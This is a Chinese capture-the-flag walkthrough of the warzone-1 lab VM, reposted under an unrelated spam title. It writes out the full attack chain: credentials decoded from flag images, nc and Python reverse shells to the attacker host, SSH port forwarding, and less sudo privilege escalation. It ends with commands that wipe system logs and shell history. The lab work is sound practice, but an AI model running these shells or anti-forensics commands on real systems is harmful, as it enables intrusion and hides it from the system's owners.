您的位置:首页 > 汽车 > 新车 > 软件开发app开发定制外包33_建设工程施工合同司法解释一_网络营销方案案例范文_河南品牌网络推广外包

软件开发app开发定制外包33_建设工程施工合同司法解释一_网络营销方案案例范文_河南品牌网络推广外包

2025/1/5 16:27:16 来源:https://blog.csdn.net/China_I_LOVE/article/details/144836901  浏览:    关键词:软件开发app开发定制外包33_建设工程施工合同司法解释一_网络营销方案案例范文_河南品牌网络推广外包
软件开发app开发定制外包33_建设工程施工合同司法解释一_网络营销方案案例范文_河南品牌网络推广外包

前言

靶机:warzone-1,IP地址192.168.1.71

攻击:kali,IP地址192.168.1.16

都采用虚拟机,网卡为桥接模式

主机发现

因为都是同一局域网下,相当于内网环境,所以使用下面的工具,若想要真实模拟外网。可以使用nmap等工具

使用arp-scan -lnetdiscover -r 192.168.1.1/24扫描

信息收集

使用nmap扫描端口

2-1

FTP服务探测

尝试使用匿名用户anonymous空密码登录测试,发现可以登录成功,并发现目录及目录下的三张PNG图片

把这些图片下载到kali

查看图片信息,发现username.pngpassword.png是一种旗帜。应该是某种加密方法

直接百度搜索旗语,发现海军旗语与之对应

把两个图片中的信息进行按行一一对比,假设这里都是字母,并没有数字,若是数字结合起来,情况就有点太多,这应该不是靶场作者的目的

username.png中为SEMAPHORE,转为小写后semaphore

password.png中为SIGNALPERSON,转为小写后signalperson

查看token.png,发现是一种加密

按照这种方式进行加密,先把hash中的username+password

semaphoresignalperson

echo -n "semaphoresignalperson" | openssl dgst -sha256
#-n放置换行符
#最终输出结果,hash等于
hash=833ad488464de1a27d512f104b639258e77901f14eab706163063d34054a7b26

再进行16进制转换

结果为383333616434383834363464653161323764353132663130346236333932353865373739303166313465616237303631363330363364333430353461376232360a

不过这里获取到之后,还不知道有什么用

1337端口

之前在nmap扫描的时候,对于1337端口就比较特别,尝试浏览器访问,发现无内容,说明并非http服务。尝试nc连接这个端口,看有无信息,发现有信息

尝试把上面的信息结合起来,输入用户名和密码以及token,不过这里的token与图片中不符,是hash

提示三种命令可用,那么尝试使用nc构造反弹shell

在靶机构造payload

nc -e /bin/bash 192.168.1.16 9999
#ip地址为kali的地址

不过需要先在kali中开启监听

nc -lvvp 9999

使用dpkg -l | grep python,查看靶机内有无安装python,发现python3

python3 -c 'import pty;pty.spawn("/bin/bash")'

查看当前目录下的文件,发现一个目录,并非常见目录,进入查看,发现三个文件,其中一个为密码

发现密码i_hate_signals!

剩下的两个文件,sh脚本执行jar文件,把该文件下载到kali中,反编译后,发现为启动1337服务的代码

提权

提权至flagman

因为这个文件是在用户flafman用户家目录下的,所以猜测发现的密码是其密码,然后使用ssh连接登录

查看flag

提权至admiral

使用find寻找具有SUID权限的文件,发现sudo,尝试查看该文件,发现没有权限

尝试以admiral执行脚本

发现开启了某种服务,并且给出了一个PIN值

不过是开启在靶机内的地址端口,不过这里可以使用ssh连接,那么就可以尝试在kali中进行端口转发,把靶机内的本地服务进行转发

ssh -L 5000:127.0.0.1:5000 flagman@192.168.1.71 -Nf

kali浏览器访问本地的5000端口

尝试进行目录爆破

gobuster dir -u http://127.0.0.1:5000 -w /usr/share/wordlists/dirb/big.txt -b 404,403

访问console,发现需要提供一个PIN,在前面开启脚本的时候,有一个PIN的提示,输入前面的PIN后,发现获取一个类似终端的界面,测试使用,结合前面的脚本为py,确定为python终端

那么尝试进行python的反弹shell,在kali中先进行监听,不过测试后发现bash反弹无效,更换为nc反弹,不过这里并未显示nc反弹命令,但是直接反弹成功

import os
os.system("nc -e /bin/sh 192.168.1.16 7777")

使用python3获取交互式界面,然后查看其目录下的flag

提权至root

还是测试sudo -l,发现无需密码,并且是一个less提权

可以借助网站gtfobins.github.io查看其他方式

提权成功

清理痕迹

清除日志

sed -i "/192.168.1.16/d" /var/log/auth.log
echo > /var/log/btmp
echo > /var/log/wtmp
echo > /var/log/faillog
echo > /var/log/lastlog
echo > /var/log/apache2/access.log
echo > /var/log/apache2/error.log

剩下还需要清除开启服务时的一些日志

清理历史命令记录

history -r
history -c

总结

该靶场考察以下几点:

  1. 一些加密,这里是海军旗帜加密
  2. 学会分析代码,根据代码解出密码
  3. 学会查看隐藏文件,在linux中的隐藏文件以.开头
  4. 当有ssh服务连接时,可以把靶机的本地地址端口进行转发
  5. 然后会各种反弹shellbashnc
  6. 学会python提权
  7. 学会sudo提权,这里是less

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com